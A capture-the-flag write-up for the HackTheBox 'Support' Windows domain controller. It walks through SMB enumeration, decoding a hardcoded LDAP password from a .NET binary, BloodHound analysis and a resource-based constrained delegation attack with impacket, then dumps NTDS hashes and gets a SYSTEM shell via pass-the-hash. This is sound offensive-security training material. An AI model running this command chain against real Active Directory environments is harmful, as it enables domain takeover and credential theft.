HTB - Support
Scope
Enumeration
Nmap Scan
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49757/tcp open unknown syn-ack
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p53,135,139,445,464,593,636,3268,5985,49757 $ip -Pn -oN script-scan -sCV
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49757/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-05T22:01:48
|_ start_date: N/A
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap* Open ports: 53,135,139,445,464,593,636,3268,5985
* UDP Open ports: 53 - 88 - 123 - 389
* Services: DNS - RPC - SMB - NETBIOS - LDAP - KERBEROS - winRMDNS
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ dig axfr support.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr support.htb @10.10.11.174
;; global options: +cmd
; Transfer failed. RPC
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ rpcclient -U "%" $ip
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIEDSMB
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.11.174 445 DC [+] support.htb\:
SMB 10.10.11.174 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIEDI opened a file and list share names in it, Then I created a for loop to find accessible share
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cat list| awk '{print $1}' | tee -a share.list
ADMIN$
C$
IPC$
NETLOGON
support-tools
SYSVOL
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ for share in $(cat share.list);do echo "\n\tShare Name is: $share\n" && smbclient -N \\\\$ip\\$share;done
<snip>
Share Name is: support-tools
smb: \> ls
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
<snip>I will mount the remote share on my kali machine to easily navigate the share
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ mkdir mnt
┌──(kali㉿kali)-[~/…/HTB/machines/Support/New]
└─$ sudo mount -t cifs "\\\\$ip\\support-tools" ./mnt
Password for root@\\10.10.11.174\support-tools:
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cd mnt
┌──(kali㉿kali)-[~/…/machines/Support/New]
└─$ ls
7-ZipPortable_21.07.paf.exe WiresharkPortable64_3.6.5.paf.exe windirstat1_1_2_setup.exe
SysinternalsSuite.zip npp.8.4.1.portable.x64.zip
UserInfo.exe.zip putty.exeUserInfo.exe.zip File looks interesting, So I will copy it to windows machine
┌──(kali㉿kali)-[~/…/machines/Support/New]
└─$ unzip -l UserInfo.exe.zip
Archive: UserInfo.exe.zip
Length Date Time Name
--------- ---------- ----- ----
12288 2022-05-27 13:51 UserInfo.exe
99840 2022-03-01 13:18 CommandLineParser.dll
22144 2021-10-22 19:42 Microsoft.Bcl.AsyncInterfaces.dll
47216 2021-10-22 19:48 Microsoft.Extensions.DependencyInjection.Abstractions.dll
84608 2021-10-22 19:48 Microsoft.Extensions.DependencyInjection.dll
64112 2021-10-22 19:51 Microsoft.Extensions.Logging.Abstractions.dll
20856 2020-02-19 05:05 System.Buffers.dll
141184 2020-02-19 05:05 System.Memory.dll
115856 2018-05-15 09:29 System.Numerics.Vectors.dll
18024 2021-10-22 19:40 System.Runtime.CompilerServices.Unsafe.dll
25984 2020-02-19 05:05 System.Threading.Tasks.Extensions.dll
563 2022-05-27 12:59 UserInfo.exe.config
--------- -------
652675 12 filesI've downloaded dnSpy.exe before, So I decided to open the files with it, Under LdapQuery tab there is interesting information here
A user has a name support\ldap but the password is protected
public LdapQuery()
{
string password = Protected.getPassword();
this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
this.entry.AuthenticationType = AuthenticationTypes.Secure;
this.ds = new DirectorySearcher(this.entry);
}I clicked on getPassword() Function to see its content
namespace UserInfo.Services
{ // Token: 0x02000006 RID: 6
internal class Protected {
public static string getPassword()
{
byte[] array = Convert.FromBase64String(Protected.enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
}
return Encoding.Default.GetString(array2);
}
// Token: 0x04000005 RID: 5
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
// Token: 0x04000006 RID: 6
private static byte[] key = Encoding.ASCII.GetBytes("armando");
}
}I can say that it's a decryption function to get the password in secure way involving base64 encoding and xor operation, So I asked chatGPT to rewrite this function in python to be able to run it on my host and here is the code
import base64
class Protected:
enc_password = "<encrypted>"
key = "<key>".encode('ascii')
@staticmethod
def get_password():
array = base64.b64decode(Protected.enc_password)
array2 = bytearray(array) # bytearray allows in-place modification
for i in range(len(array)):
array2[i] = array[i] ^ Protected.key[i % len(Protected.key)] ^ 223
return array2.decode('ascii')
# Decodes the bytearray to a string # Usage example:
password = Protected.get_password()
print(password)Run it and you will get the password
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nano get_password.py
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ python3 get_password.py
nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxxxxxI verified with crackmapexec and Success :)
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxxx'
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxx Initial Access
I tried to connect with winRM but failed So I decided to continue enumerating the domain with bloodhound-python and rpcclient
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ bloodhound-python -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8xxxxxxxxxx' -ns $ip -d support.htb -c allI Created a zip file to upload it to bloodhound GUI after starting it
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ zip support.zip *.json
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo neo4j start
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:45250). It is available at http://localhost:7474
There may be a short delay until the server is ready.
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ bloodhound I put custom query to bloodhound to see which user can PSRemote to the machine
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
I can also see that support User exists from rpcclient command
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ rpcclient -U 'ldap%nvEfEK16^1aM4$e7AclUf8xxxxxxxxxxxx' $ip
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[ldap] rid:[0x450]
user:[support] rid:[0x451]
<snip>I searched for this account on bloodhound and knew that support account is a member of SHARED SUPPORT ACCOUNTS which has GenericAll rights on DC.SUPPORT.HTB which is an attack path known as Resource based constrianed delegation (RBCD), So If I have the support I can takeover the DC
I search a lot to get the syntax of ldapsearch as it's confusing for me to get information from ldap about user support
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ ldapsearch -H ldap://$ip -x -b "CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB" -s sub "*" -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | tee -a support.output
<snip>
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
<snip>There is a value in info field, So I will try to connect to the machine with it and I got a hit :)
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u support -p 'Ironside47pleasure40Watchful'
SMB 10.10.11.174 445 DC [+] support.htb\support:Ironside47pleasure40Watchful We knew from bloodhound that we can PSRemote with user support, So I fired up evil-winrm and waited for a shell access
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ evil-winrm -i $ip -u support -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Documents>
*Evil-WinRM* PS C:\Users\support> type Desktop\user.txt
8959fba6ef693c03xxxxxxxxxxxxxxPrivilege Escalation
The path to domain admins is already obvious now. We can get the help of this post if we want to perform attack from Linux:
We need a fake computer account and the name of the machine account that we can write attribute on.
The machine's name is DC$
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-addcomputer HTB.LOCAL/mrb3n -dc-ip 192.168.x.x -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-rbcd support.htb/support:'Ironside47pleasure40Watchful' -dc-ip $ip -action write -delegate-from 'ATTACK$' -delegate-to 'DC$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACK$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACK$ (S-1-5-21-1677581083-3380853377-188903654-5601)
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-getST -spn 'cifs/DC.SUPPORT.HTB' -impersonate Administrator 'support.htb/ATTACK$:AttackerPC1!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ export KRB5CCNAME =`pwd/Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccacheFor some reason, I couldn't connect with psexec.py or dump hashes with secretsdump.py, So I switched to crackmpaexec
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u administrator -k --use-kcache --ntds
<snip>
SMB 10.10.11.174 445 DC [+] support.htb\ from ccache Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddxxxxxxxxxxxx:::
<snip> ┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-psexec support.htb/administrator@$ip -hashes :bb06cbc02b39abedddxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.11.174.....
[*] Found writable share ADMIN$
[*] Uploading file bNtWYSHx.exe
[*] Opening SVCManager on 10.10.11.174.....
[*] Creating service yBfc on 10.10.11.174.....
[*] Starting service yBfc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
e99ab2203321xxxxxxxxxxxxxxxxLast updated